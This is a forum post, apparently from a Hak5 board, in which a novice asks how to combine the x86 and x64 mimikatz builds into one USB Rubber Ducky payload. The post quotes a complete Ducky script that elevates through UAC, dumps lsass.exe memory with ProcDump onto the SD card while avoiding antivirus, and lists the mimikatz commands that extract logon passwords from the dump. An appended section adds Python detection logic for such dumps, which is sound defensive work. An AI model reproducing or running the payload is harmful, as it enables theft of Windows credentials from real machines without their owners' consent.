HELP! Mimikatz x86 and x64 in one payload


Applenuts


Please someone help?? I am a complete n00b to this stuff, but diving in head first, fast~n~hard. I have successfully compiled and used DK's mimikatz\ProcDump payload. My issue lies in the fact that I have to switch the mimikatz.exe between x86 and x64 manually, depending on the OS. Which implies my inspecting said machine first, then plugging in, swapping files, and so on. Or having separate .bins (SHIFT+payload button or CTRL+payload button, etc.). Is there a way to have one payload using either .exe version from the root dir? If so, could someone please help a n00b out? THaNX iN AdVAnCE

*****************************************************************************************************************************************************************************

REM Author: Hak5Darren with the help of:
REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals
REM
REM Description: "Backup" Windows Passwords without setting off AntiVirus
REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
REM Passwords can later be extracted using mimikatz.
REM
REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
REM
REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
REM
REM Target: Windows Vista/7/8, Win32/x64

REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500

REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500

REM *** Execute procdump from SD card and save log file to disk ***
STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmp
ENTER

REM *** GTFO ***
STRING exit
ENTER

REM *** Post Exploitation ***
REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a
REM directory including the version of mimikatz for your target's architecture
REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
REM mimikatz.exe <enter>
REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
REM sekurlsa::logonPasswords full <enter>

*****************************************************************************************************************************************************************************
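As an added defender-side example (not part of the original post or of the Hak5 payload), here is a small rule that flags the lsass dump performed by the payload above in Sysmon-style process-creation (ID 1) and process-access (ID 10) telemetry. The event fields, the access-mask bits and the allow-list of expected lsass readers are assumptions to be tuned per environment; the sample events are constructed.

```python
import re
from dataclasses import dataclass

# Assumption: processes that legitimately open lsass.exe on this host; tune per environment.
EXPECTED_LSASS_READERS = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}
# PROCESS_QUERY_INFORMATION (0x0400) | PROCESS_VM_READ (0x0010): the minimum a minidump needs.
DUMP_ACCESS_MASK = 0x0410

@dataclass
class Event:
    event_id: int            # Sysmon-style IDs: 1 = process creation, 10 = process access
    image: str               # full path of the acting (source) process
    command_line: str = ""   # event 1 only
    target_image: str = ""   # event 10 only
    granted_access: int = 0  # event 10 only

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def flag_lsass_dump(ev):
    """Return a reason string if the event looks like a ProcDump-style lsass dump, else None."""
    if ev.event_id == 1:
        cl = ev.command_line.lower()
        # The payload's own line: procdump.exe -accepteula -ma lsass.exe <out.dmp>
        if "procdump" in _basename(ev.image) and "lsass" in cl and re.search(r"\s-ma(\s|$)", cl):
            return f"full process dump of lsass requested: {ev.command_line}"
    elif ev.event_id == 10 and _basename(ev.target_image) == "lsass.exe":
        src = _basename(ev.image)
        if src not in EXPECTED_LSASS_READERS and (ev.granted_access & DUMP_ACCESS_MASK) == DUMP_ACCESS_MASK:
            return f"{src} opened lsass.exe with read access 0x{ev.granted_access:x}"
    return None

def scan(events):
    """Run the rule over a sequence of events and return the reason for every hit."""
    return [r for r in (flag_lsass_dump(e) for e in events) if r]

# Constructed sample telemetry mirroring the payload (E: stands in for the removable drive).
SAMPLE_EVENTS = [
    Event(1, r"E:\procdump.exe", command_line=r"E:\procdump.exe -accepteula -ma lsass.exe E:\HOST01_lsass.dmp"),
    Event(10, r"E:\procdump.exe", target_image=r"C:\Windows\System32\lsass.exe", granted_access=0x1FFFFF),
    Event(10, r"C:\Windows\System32\csrss.exe", target_image=r"C:\Windows\System32\lsass.exe", granted_access=0x1410),
    Event(1, r"C:\Windows\System32\notepad.exe", command_line="notepad.exe lsass_notes.txt"),
]

if __name__ == "__main__":
    for reason in scan(SAMPLE_EVENTS):
        print("ALERT:", reason)
```

The access-mask check catches the same dump even when the tool is renamed or run from a different path, which the command-line match alone would miss.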
